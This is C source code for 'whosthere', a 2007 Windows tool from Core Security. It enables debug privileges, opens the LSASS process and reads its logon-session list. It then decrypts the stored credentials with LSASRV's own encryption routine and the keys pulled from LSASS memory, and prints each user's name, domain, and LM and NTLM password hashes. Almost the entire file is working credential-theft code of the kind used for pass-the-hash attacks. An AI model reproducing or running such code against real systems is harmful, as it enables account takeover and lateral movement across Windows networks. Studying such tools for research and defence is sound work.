// $Id: whosthere.c,v 1.7 2007/09/03 21:32:28 hochoa Exp $
//
#include <windows.h>
#include <stdio.h>
#include <psapi.h>
#include "../iam/findfuncs.h"

/*
 * whosthere.c
 *
 * Description: 
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com)
 *
 * Copyright (c) 2007 CORE SDI S.A., Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

static BOOL g_debugEnabled			= 1;
static AddressesGroup				_addrGroup;

// Windows XP SP2 LSASRV.DLL Addresses
#define FEEDBACK_ADDR_XPSP2			0x757CFBF8
#define	DESKEY_PTR_ADDR_XPSP2			0x757CFC00
#define LSAENCRYPTMEMORY_ADDR_XPSP2		0x757456C2
#define LOGON_SESSION_LIST_ADDR_XPSP2		0x757cec60
#define LOGON_SESSION_LIST_COUNT_XPSP2 		0x757cee54

// Windows Server 2003 LSASRV.DLL Addresses


// Windows Vista LSASRV.DLL Addresses


// Typedef for Ptr to LSASRV.DLL 'LsaEncryptMemory' internal function
typedef void  (*LsaEncryptMemoryFunction)(unsigned char* buff, unsigned long len, int mode);


// Global variables
// Buffer with the DES IV
BYTE g_LsasrvIVBuffer[8];
// Buffer with the DES SK Table
BYTE g_LsasrvSKTable[1024];

 
#pragma pack  (1)
typedef struct {

	DWORD unk1;
	DWORD packageid;
	DWORD ptrToCreds;

} CREDS_ENTRY;

typedef struct {

	DWORD unk1;
	DWORD primaryLength;
	DWORD primaryPtr;
	DWORD hashesLength;
	DWORD hashesPtr;

} CREDS_HASH_ENTRY;

typedef struct {

	DWORD nextEntry;
	DWORD prevEntry;
	DWORD unk1;
	DWORD unk2;
	DWORD userSize;
	DWORD userNamePtrUnicode;
	DWORD machineSize;
	DWORD machinePtrUnicode;
	DWORD unk3;
	DWORD unk4;
	DWORD unk5Ptr;

	 } SESSION_ENTRY;

DWORD GetLSASSPid(void)
{
	
	DWORD ProcArray[100];
	DWORD nBytes;
	int nTotalProc;
	int nProc = 0;

	EnumProcesses(ProcArray, sizeof(ProcArray), &nBytes);
	nTotalProc = nBytes / sizeof(DWORD);

	for (nProc = 0; nProc < nTotalProc; nProc++)
	{
		CHAR szFileName[MAX_PATH];
		HMODULE ModArray[100];
		HANDLE hProc;

		hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
			FALSE, ProcArray[nProc]);
		EnumProcessModules(hProc, ModArray, sizeof(ModArray), &nBytes);
		GetModuleFileNameEx(hProc, ModArray[0], szFileName, sizeof(szFileName));
		CloseHandle(hProc);

		if (strstr(szFileName, "lsass.exe"))
		{
			return ProcArray[nProc];

		}
	}
	
	return 0;
}

BOOL
EnableDebugPriv(
    VOID
    )

/*++

Routine Description:

    Changes the process's privilege so that kill works properly.

Arguments:


Return Value:

    TRUE             - success
    FALSE            - failure

--*/

{
    HANDLE hToken;
    LUID DebugValue;
    TOKEN_PRIVILEGES tkp;


    //
    // Retrieve a handle of the access token
    //
    if (!OpenProcessToken(GetCurrentProcess(),
            TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
            &hToken)) {
        printf("OpenProcessToken failed with %d\n", GetLastError());
        return FALSE;
    }

    //
    // Enable the SE_DEBUG_NAME privilege
    //
    if (!LookupPrivilegeValue((LPSTR) NULL,
            SE_DEBUG_NAME,
            &DebugValue)) {
        printf("LookupPrivilegeValue failed with %d\n", GetLastError());
        return FALSE;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = DebugValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    AdjustTokenPrivileges(hToken,
        FALSE,
        &tkp,
        sizeof(TOKEN_PRIVILEGES),
        (PTOKEN_PRIVILEGES) NULL,
        (PDWORD) NULL);

    //
    // The return value of AdjustTokenPrivileges can't be tested
    //
    if (GetLastError() != ERROR_SUCCESS) {
        printf("AdjustTokenPrivileges failed with %d\n", GetLastError());
        return FALSE;
    }

    return TRUE;
}


// Decrypt Credentials
unsigned int EncryptDecryptCredentials(unsigned char *pInBuffer, unsigned char *pOutBuffer, unsigned int len, int mode)
{
HANDLE hDll;
BYTE *tmpBuffer;
LsaEncryptMemoryFunction LsaEncryptMemory;


	if( pInBuffer == NULL || pOutBuffer == NULL || len == 0 ) return FALSE;	

	hDll = LoadLibrary("LSASRV.DLL");
	if( hDll == INVALID_HANDLE_VALUE ) {
		return FALSE;
	}

	tmpBuffer = (BYTE*)malloc( len );
	if( tmpBuffer == NULL ) return FALSE;

	LsaEncryptMemory = (LsaEncryptMemoryFunction)_addrGroup.pEncryptMemory;
		
	memcpy((BYTE*)_addrGroup.pFeedback, &g_LsasrvIVBuffer[0], 8);
	*((DWORD*)_addrGroup.pDESKey) = (unsigned long)&g_LsasrvSKTable;

	memcpy(tmpBuffer, pInBuffer, len);	
	LsaEncryptMemory(tmpBuffer, len, mode);
	memcpy(pOutBuffer, tmpBuffer, len);

	free(tmpBuffer);
	FreeLibrary(hDll);
	return TRUE;
}


void banner(void)
{

	printf("WHOSTHERE v1.1 - by Hernan Ochoa (hochoa@coresecurity.com) - (c) 2007 Core Security Technologies\n");
	printf("This tool lists the active LSA logon sessions with NTLM credentials.\n");
	printf("Options: use -B to try to find out the correct addresses in run-time.\n");

}

void help(void)
{
	printf("Options: use -B to try to find out the correct addresses in run-time.\n");
}


int main(int argc, char **argv)
{
HANDLE hLSASS;
DWORD dwLSASS_pid;
char buffer[1024];
DWORD dwBytesRead, dwTemp;
BOOL bRet;
int j;
DWORD sessionEntryBuffer[0x48+4];
DWORD dwSessionListPtr;
DWORD dwSessionListCount;
DWORD dwSessionListEntryPtr;
SESSION_ENTRY* pEntry;
CREDS_ENTRY credsEntry;
int n=0, x=0, y=0;
PBYTE pTemp;
DWORD credPtr;
CREDS_HASH_ENTRY credsHashEntry;
char hashesBuffer[1024];
DWORD ptrToSK;
BOOL bFindFuncs;


		banner();

		// do not find functions by default
		bFindFuncs = FALSE;

		// Set the addresses to the default 2976, xpsp2, english lsasrv.dll
		_addrGroup.pAddCredential = (PBYTE)VALUE_UNKNOWN;
		_addrGroup.pEncryptMemory = (PBYTE)LSAENCRYPTMEMORY_ADDR_XPSP2;
		_addrGroup.pFeedback = (PBYTE)FEEDBACK_ADDR_XPSP2;
		_addrGroup.pDESKey = (PBYTE)DESKEY_PTR_ADDR_XPSP2;
		_addrGroup.pLogonSessionList = (PBYTE)LOGON_SESSION_LIST_ADDR_XPSP2;
		_addrGroup.pLogonSessionListCount = (PBYTE)LOGON_SESSION_LIST_COUNT_XPSP2;

		// Did the user supply a parameter?
		// is it -B?
		if( (argc == 2) && (!strcmp(argv[1], "-B")) ) {
			bFindFuncs = TRUE;
		}
		else if( argc == 2 ) {
			// invalid parameter
			printf("Invalid parameter: %s\n", argv[1]);
			help();
			return 0;
		}

		// if bFindFuncs, try to find the addresses using heuristics
		if( bFindFuncs == TRUE ) {
					AddressesGroup aGroup;
					printf("-B specified. Trying to find correct addresses..");
					if( findFuncs(&aGroup) == FALSE ) {
							printf("Can't find addresses!.\n");
							return 0;
					}
					// We found the addresses, so copy those to the global structure
					printf("Found!.\n");
					_addrGroup = aGroup;
		}

		if( EnableDebugPriv() == FALSE ) {
					printf("Could not enable debug privileges. You must run this tool with an account with administrator privileges.\n");
					exit(0);
		}

		memset(buffer, '\0', 1024);


		dwLSASS_pid = GetLSASSPid();
		if( dwLSASS_pid == 0 ) {
			printf("Cannot get LSASS.EXE PID!\n");
			exit(0);
		}

		hLSASS = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwLSASS_pid);
		printf("LSASS HANDLE: %x\n", hLSASS);
		if( hLSASS == INVALID_HANDLE_VALUE ) {
			printf("Error: Cannot open LSASS.EXE!.\n");
			exit(0);
		}


			
		// Read 'IV' From LSASS' Memory
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pFeedback,
		(LPVOID)&g_LsasrvIVBuffer[0], 8, &dwBytesRead);

		if(bRet == FALSE || dwBytesRead != 8 ) {
			printf("Cannot read IV from LSASS!.\n");
			exit(0);
		}

		if( g_debugEnabled ) {
			
			printf("IV = ");
			for(j = 0; j<8; j++) {
				printf("%.2Xh ", (unsigned char)g_LsasrvIVBuffer[j]);
			}
			printf("\n");
		}

		// Read Prt to 'SK' table from LSASS' Memory
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pDESKey,
		(LPVOID)&ptrToSK, 4, &dwBytesRead);

		if(bRet == FALSE || dwBytesRead != 4 ) {
			printf("Cannot read ptr to SK Table from LSASS!.\n");
			exit(0);
		}

		// Now Read data in 'SK' table from LSASS' Memory
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)ptrToSK,
		(LPVOID)&g_LsasrvSKTable[0], 0x190, &dwBytesRead);

		if(bRet == FALSE || dwBytesRead != 0x190 ) {
			printf("Cannot read ptr to SK Table from LSASS!.\n");
			exit(0);
		}

		if( g_debugEnabled ) {
			printf("DESXKey Table = ");
			for(j = 0; j<0x190; j++) {
				printf("%.2Xh ", (unsigned char)g_LsasrvSKTable[j]);
			}
			printf("\n");
		}



		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pLogonSessionList, (LPVOID)&buffer[0], 4,&dwBytesRead);
		if(bRet == FALSE || dwBytesRead != 4 ) {
				printf("Error: cannot read Logon session list address.\n");
				exit(0);
		}

		dwSessionListPtr = *(DWORD*)&buffer[0];
		printf("Session List Address: %.8Xh\n", dwSessionListPtr);

		bRet = ReadProcessMemory(hLSASS, (LPCVOID)_addrGroup.pLogonSessionListCount, (LPVOID)&buffer[0], 4, &dwBytesRead);

		if( bRet == FALSE || dwBytesRead != 4 ) {
			printf("Error: cannot read Logon Session List Count!.\n");
			exit(0);
		}

		dwSessionListCount = *(DWORD*)&buffer[0];
		printf("Session List Count: %d\n", dwSessionListCount);

		// Read Entry
		dwSessionListEntryPtr = dwSessionListPtr;

		for(y=0; y<dwSessionListCount; y++) {

			bRet = ReadProcessMemory(hLSASS, (LPCVOID)dwSessionListEntryPtr, (LPVOID)&sessionEntryBuffer, 0x48+4, &dwBytesRead);
				if( bRet == FALSE || dwBytesRead != 0x48+4 ) {
					printf("Error: cannot List Session List Entry!.\n");
					exit(0);
				}

			pEntry = (SESSION_ENTRY*)&sessionEntryBuffer[0];
			printf("NEXT: %.8Xh\n", pEntry->nextEntry);
			dwSessionListEntryPtr=pEntry->nextEntry;
			printf("PREV: %.8Xh\n", pEntry->prevEntry);
			printf("\tusersize: %.8xh\n", pEntry->userSize);
			printf("\tuserNamePtrUnicode: %.8xh\n", pEntry->userNamePtrUnicode);
			printf("\tmachineSize: %.8Xh\n", pEntry->machineSize);
			printf("\tmachinePtrUnicode: %.8Xh\n", pEntry->machinePtrUnicode);
			pTemp = (PBYTE)&sessionEntryBuffer[0];
			pTemp += 0x48;
			//printf("CredentialsPtr: %.8Xh\n", *((DWORD*)pTemp));
			// Read Credentials struct
			credPtr = *((DWORD*)pTemp);

			if( credPtr != (DWORD)NULL ) {

				bRet  = ReadProcessMemory(hLSASS, (LPCVOID)credPtr, (LPVOID)&credsEntry, sizeof(CREDS_ENTRY), &dwBytesRead);

					if( bRet == FALSE || dwBytesRead != sizeof(CREDS_ENTRY) ) {
						printf("Error: Cannot read credentials!.\n");
						exit(0);
					}

				// Print some info about credentials
				printf("\tunkown1: %.8Xh\n", credsEntry.unk1);
				printf("\tpackageid: %.8Xh\n", credsEntry.packageid);
				printf("\tptrToCreds: %.8Xh\n", credsEntry.ptrToCreds);

				// read credentials hash struct
				bRet = ReadProcessMemory(hLSASS, (LPCVOID)credsEntry.ptrToCreds,
					(LPVOID)&credsHashEntry, sizeof(CREDS_HASH_ENTRY),
					&dwBytesRead);

				if( bRet == FALSE || dwBytesRead != sizeof(CREDS_HASH_ENTRY) ) {
						printf("Errori: Cannot read credentials hash struct!.\n");
						exit(0);
				}

				printf("\tunknown 1: %.8Xh\n", credsHashEntry.unk1);
				printf("\tprimaryLength: %.8Xh\n", credsHashEntry.primaryLength);
				printf("\tprimaryPtr: %.8Xh\n", credsHashEntry.primaryPtr);
				printf("\thashesLength: %.8Xh\n", credsHashEntry.hashesLength);
				printf("\thashesPtr: %.8Xh\n", credsHashEntry.hashesPtr);
				// read hashes ptr
				//x = (credsHashEntry.hashesLength)&0x0000ffff;
				x = (credsHashEntry.hashesLength)>>16;
				if( g_debugEnabled ) {
					printf("\thashesRealLength: %.8Xh\n", x);
				}
				bRet = ReadProcessMemory(hLSASS, (LPCVOID)credsHashEntry.hashesPtr,
					(LPVOID)hashesBuffer, x, &dwBytesRead);

				if( bRet == FALSE || dwBytesRead != x ) {
					printf("Error: cannor read hashes ptr!.\n");
					exit(0);
				}

				#if 0
					printf("\t");
					// print creds encrypted
					for(j=0; j<x; j++) {
						printf("\\x%.2X", (unsigned char)hashesBuffer[j]);
					}

				printf("\n");
				#endif


				// Decrypt Credentials
				{
				BYTE outBuffer[2048];
				BYTE NTLMhashes[16];
				BYTE LANMANhashes[16];
				// format
				// DWORD len,maxlen
				// OFFSEt to USERNAME
				// DWORD len,maxlen
				// OFFSET to DOMAIN
				// byte lm[16]
				// byte nt[16]
				// dataaa
				unsigned int v, usernameLen, domainLen, usernameOffset, domainOffset;
				EncryptDecryptCredentials(hashesBuffer, outBuffer, x, 0);
				//printf("\t"); 
				//for(j=0; j<x; j++) {
					//	printf("\\x%.2X", (unsigned char)outBuffer[j]);
				//}	
				//printf("\n");
				domainLen = *((DWORD*)&outBuffer);
				domainLen >>= 16;
				domainOffset = *((DWORD*)&outBuffer[4]);
				usernameLen = *((DWORD*)&outBuffer[8]);
				usernameLen >>=16;
				usernameOffset = *((DWORD*)&outBuffer[12]);
				printf("usernameLen: %.8Xh\n", usernameLen);
				printf("usernameOffset: %.8Xh\n", usernameOffset);
				printf("domainLen: %.8Xh\n", domainLen);
				printf("domainOffset: %.8Xh\n", domainOffset);
				printf("\n\t");
				// Name and domain are in UNICODE
				for(v=0; v<usernameLen-2; v+=2) printf("%c", (BYTE)outBuffer[usernameOffset+v]);
				printf(":");
				for(v=0; v<domainLen-2; v+=2) printf("%c", (BYTE)outBuffer[domainOffset+v]);
				printf(":");
				memcpy((PBYTE)&NTLMhashes[0], (PBYTE)&outBuffer+0x10, 0x10);
				memcpy((PBYTE)&LANMANhashes[0], (PBYTE)&outBuffer+0x20, 0x10);
				for(v=0; v<0x10; v++) printf("%.2X", LANMANhashes[v]);
				printf(":");
				for(v=0; v<0x10; v++) printf("%.2X", NTLMhashes[v]);
				printf("\n");
				}

		}


		// Read User Name
		x = (pEntry->userSize)>>16;
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)pEntry->userNamePtrUnicode,
			(LPVOID)&buffer[0], x, &dwBytesRead);

		if( bRet == FALSE || dwBytesRead != x ) {
			printf("Error: Cannot read usernamePtrUnicode!.\n");
			exit(0);
		}


		printf("\tUsername: ");
		pTemp = (PBYTE)&buffer[0];
		for(n=0; n<x/2; n++)
		{
			putchar(*pTemp);
			pTemp +=2;
		}
		puts("\n");

		// Read DOMAIN NAME
		//printf("machinePtrUnicode: %.8Xh\n", pEntry->machinePtrUnicode);	
		x = (pEntry->machineSize)>>16;
		bRet = ReadProcessMemory(hLSASS, (LPCVOID)pEntry->machinePtrUnicode,
			(LPVOID)&buffer[0], x, &dwBytesRead);

		if( bRet == FALSE || dwBytesRead != x ) {
			printf("Error: Cannot read machinePtrUnicode!.\n");
			exit(0);
		}

		printf("\tDomain/Workgroup/Machine Name: ");
		pTemp = (PBYTE)&buffer[0];
		for(n=0; n<x/2; n++)
		{
			putchar(*pTemp);
			pTemp +=2;
		}
		puts("\n");


	}


}
